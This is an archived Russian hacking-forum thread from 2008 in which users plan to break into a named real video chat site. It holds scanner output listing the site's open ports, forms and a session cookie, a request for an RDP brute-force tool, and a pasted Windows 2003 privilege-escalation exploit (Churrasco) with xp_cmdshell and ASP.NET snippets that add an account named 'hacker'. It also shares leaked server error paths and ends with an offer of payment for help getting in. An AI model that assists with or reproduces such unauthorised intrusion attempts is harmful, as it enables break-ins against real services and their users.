Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   Америкосы учередили видео чат www.letsvideochat.net а про дыры забыли (смотрим) (https://forum.antichat.xyz/showthread.php?t=94015)

Spider_Klim 29.11.2008 00:07
Америкосы учередили видео чат www.letsvideochat.net а про дыры забыли (смотрим)
 
Есть видео чат www.letsvideochat.net.

Система видновс 2003 сервер.

Открытые порты:

порт 80 .
баги:
Список cookie
1. PHPSESSID=80b45d9a61247a56de7adc955edbc009; path=/

Список ссылок найденных на веб-сервере, которые используют какие-либо параметры:

/chat.php?c=1227892930


Список форм

Обнаружены формы (POST запрос), использующиеся для передачи данных на сервер. В переменных HIDDEN может храниться специфическая или чувствительная информация. Переменные PASSWORD служат для ввода пароля.

Список форм:

POST /login1.php HTTP/1.1
user_name=&user_password=

POST /register1.php HTTP/1.1
user_name=&user_pass=&user_cpass=&user_e_mail=&use r_city=&user_region=&FilePic=&terms=&user_sex=&use r_birthday_month=

POST /search.php HTTP/1.1
sex=&age=

POST /forgot1.php HTTP/1.1
user_e_mail=

........................

Честно говоря что мне это даёт я не понимаю.


Но открыт порт:

Порт 3389

Запущен сервис удалённого управления компьютером.


Я подключался.. требует логин и пароль.. скажите какой программой брут подключить.

Кто желает помочь мне я буду только рад и если хотите принять участие вперёд.

DVD_RW 29.11.2008 00:41
только эксплойт... брутфорс врятли опможет

cash$$$ 29.11.2008 00:42
XSpider конечно рулит... ;)

Держи сплойт:

Код:
(From http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html)

It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf)
was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.

Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows
services accounts can impersonate.  Other process (not services) that can impersonate are IIS 6 worker processes
so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide
shared hosting services then I would recomend to not allow users to run this kind of code from ASP.


-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:

exec xp_cmdshell 'churrasco "net user /add hacker"'


-Exploiting IIS 6 with ASP .NET :
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " \"net user /add hacker\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...


You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

backup link: http://milw0rm.com/sploits/2008-Churrasco.zip

Enjoy.

Cesar.

# milw0rm.com [2008-10-08]

Spider_Klim 29.11.2008 02:27
Осталось шел халявный найти

Spider_Klim 30.11.2008 05:12
Люди я откомпировал експлойт но он запускает у меня..

Вы конечно меня простите но я просто первый раз это делаю..

Вы не могли бы мне объяснить что должно произайти.

что я не так делаю

SanyaX 30.11.2008 08:03
Для начала воще удали Xspider, потому что он выдаёт всякую хрень.

slider 30.11.2008 10:15
+1 ... удали раз и на всегда xspider ...
он никогда ... никогда тебе не поможет...

heks 30.11.2008 10:25
ручками работай ручками
я вот это нашел
Цитата:
<br /> <b>Warning</b>: imagecreatetruecolor() [<a href='function.imagecreatetruecolor'>function.imag ecreatetruecolor</a>]: Invalid image dimensions in <b>C:\Program Files\PHP52\lvch\thumbnail.php</b> on line <b>53</b><br /> <br /> <b>Warning</b>: imagecopyresampled(): supplied argument is not a valid Image resource in <b>C:\Program Files\PHP52\lvch\thumbnail.php</b> on line <b>55</b><br /> <br /> <b>Warning</b>: imagejpeg(): supplied argument is not a valid Image resource in <b>C:\Program Files\PHP52\lvch\thumbnail.php</b> on line <b>57</b><br /> <br /> <b>Warning</b>: imagedestroy(): supplied argument is not a valid Image resource in <b>C:\Program Files\PHP52\lvch\thumbnail.php</b> on line <b>61</b><br />
и вот это

Цитата:
Fatal error: Maximum execution time of 30 seconds exceeded in C:\Program Files\PHP52\lvch\search.php on line 386

Spider_Klim 30.11.2008 16:12
Хорошо удалил помогите с експлойтом..


Я подключаюсь к порту 3389..

он выдаёт мне Подключение к удаленному рабочему столу...

а там логин и пороль а что дальше делать я незнаю..

ребят кто поможет сразу 250 рублей нащёт на телефон.


Время: 16:23